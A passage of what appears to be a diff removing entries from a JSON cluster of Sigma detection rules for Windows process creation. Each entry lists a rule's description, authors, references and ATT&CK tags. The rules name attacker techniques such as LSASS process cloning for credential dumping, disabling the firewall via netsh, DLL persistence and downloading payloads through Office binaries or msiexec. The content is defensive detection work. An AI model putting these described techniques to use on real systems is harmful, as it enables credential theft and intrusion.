"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", - "value": "Finger.exe Suspicious Invocation" - }, - { - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_format.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://twitter.com/0gtweet/status/1477925112561209344", - "https://twitter.com/wdormann/status/1478011052130459653?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "value": "Format.com FileSystem LOLBIN" - }, - { - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "meta": { - "author": "Ecco, E.M. Anhaus, oscd.community", - "creation_date": "2019/09/26", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_fsutil_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "add64136-62e5-48ea-807e-88638d02df1e", - "value": "Fsutil Suspicious Invocation" - }, - { - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "meta": { - "author": "frack113", - "creation_date": "2022/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_gpresult.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ 
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", - "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ] - }, - "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", - "value": "Gpresult Display Group Policy Information" - }, - { - "description": "Detects creation of a scheduled task with a GUID like name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", - "falsepositive": [ - "Legitimate software naming their tasks as GUIDs" - ], - "filename": "proc_creation_win_susp_guid_task_name.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "value": "Suspicious Scheduled Task Name As GUID" - }, - { - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/06", - "falsepositive": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" - ], - "filename": "proc_creation_win_susp_gup.yml", - "level": "high", 
- "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", - "value": "Suspicious GUP Usage" - }, - { - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" - ], - "filename": "proc_creation_win_susp_gup_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535322182863179776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", - "value": "Download Files Using Notepad++ GUP Utility" - }, - { - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other parent binaries using GUP not currently identified" - ], - "filename": "proc_creation_win_susp_gup_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535322445439180803", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" - ], - "tags": 
[ - "attack.execution" - ] - }, - "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "value": "Execute Arbitrary Binaries Using GUP Utility" - }, - { - "description": "Use of hostname to get information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_hostname.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "value": "Suspicious Execution of Hostname" - }, - { - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "meta": { - "author": "Florian Roth (rule), Microsoft (idea)", - "creation_date": "2022/08/04", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_iis_module_registration.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" - ], - "tags": "No established tags" - }, - "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "value": "Suspicious IIS Module Registration" - }, - { - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by 
process ghosting or other unorthodox methods to start a process)", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_image_missing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", - "value": "Execution Of Non-Existing File" - }, - { - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_instalutil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", - "value": "Suspicious Execution of InstallUtil Without Log" - }, - { - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", - "value": "Suspicious Invoke-WebRequest Usage" - }, - { - "description": "Detects suspicious IIS native-code module installations via command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/11", - "falsepositive": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" - ], - "filename": "proc_creation_win_susp_iss_module_install.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "value": "IIS Native-Code Module Command Line Installation" - }, - { - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "meta": { - "author": "frack113", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_logoff.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", - 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", - "value": "Suspicious Execution of Shutdown to Log Out" - }, - { - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "meta": { - "author": "Aaron Herman", - "creation_date": "2022/10/01", - "falsepositive": [ - "Legitimate applications installed on other partitions such as \"D:\"" - ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", - "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "value": "Wscript Execution from Non C Drive" - }, - { - "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", - "meta": { - "author": "Florian Roth, Samir Bousseaden", - "creation_date": "2021/11/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_lsass_clone.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" - ] - }, - "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "value": "Suspicious LSASS Process Clone" - }, - { - "description": "Use of reg to get MachineGuid information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_machineguid.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", - "value": "Suspicious Query of MachineGUID" - }, - { - "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "File located in the AppData folder with trusted signature" - ], - "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" - ] - }, - "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "value": "Suspicious Microsoft OneNote Child Process" - }, - { - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_missing_spaces.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1562072617552678912", - "https://ss64.com/nt/cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", - "value": "Missing Space Characters in Command Lines" - }, - { - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility 
or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mofcomp_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", - "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", - "value": "Suspicious Mofcomp Execution" - }, - { - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/08", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "filename": "proc_creation_win_susp_mounted_share_deletion.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", - "value": "Mounted Share Deleted" - }, - { - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1465058133303246867", - "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", - "value": "MpiExec Lolbin" - }, - { - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "meta": { - "author": "frack113", - "creation_date": "2022/11/17", - 
"falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msbuild.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", - "https://www.echotrail.io/insights/search/msbuild.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "value": "Suspicious Msbuild Execution By Uncommon Parent Process" - }, - { - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "meta": { - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", - "creation_date": "2019/02/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_mshta_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", - "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://twitter.com/mattifestation/status/1326228491302563846", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" - ] - }, - "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "value": "MSHTA Suspicious Execution 01" - }, - { - "description": "Detects 
suspicious mshta process patterns", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_mshta_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://en.wikipedia.org/wiki/HTML_Application", - "https://www.echotrail.io/insights/search/mshta.exe", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "value": "Suspicious MSHTA Process Patterns" - }, - { - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/n1nj4sec/status/1421190238081277959", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "value": "Mshtml DLL RunHTMLApplication Abuse" - }, - { - "description": "Detects execution of msiexec from an uncommon directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msiexec_cwd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://twitter.com/200_okay_/status/1194765831911215104", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "value": "Suspicious MsiExec Directory" - }, - { - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/09", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_msiexec_web_install.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", - "value": "MsiExec Web Install" - }, - { - "description": "Downloads payload from remote server", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_msoffice.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", - "Reegun J (OCBC Bank)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" - ], - "tags": [ - 
"attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", - "value": "Malicious Payload Download via Office Binaries" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "meta": { - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_netsh_discovery_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", - "value": "Suspicious Netsh Discovery Command" - }, - { - "description": "Detects persitence via netsh helper", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", - "https://attack.mitre.org/software/S0108/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.007", - "attack.s0108" - ] - }, - "uuid": "56321594-9087-49d9-bf10-524fe8479452", - "value": 
"Suspicious Netsh DLL Persistence" - }, - { - "description": "Detects netsh commands that turns off the Windows firewall", - "meta": { - "author": "Fatih Sirin", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate administration" - ], - "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" - ] - }, - "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "value": "Firewall Disabled via Netsh" - }, - { - "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "37e8d358-6408-4853-82f4-98333fca7014", - "value": "Execution of NetSupport RAT From Unusual Location" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of 
systems they access or through information discovery of remote systems", - "meta": { - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "filename": "proc_creation_win_susp_network_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", - "value": "Suspicious Network Command" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_network_listing_connections.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "value": "Suspicious Listing of Network Connections" - }, - { - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "meta": { - 
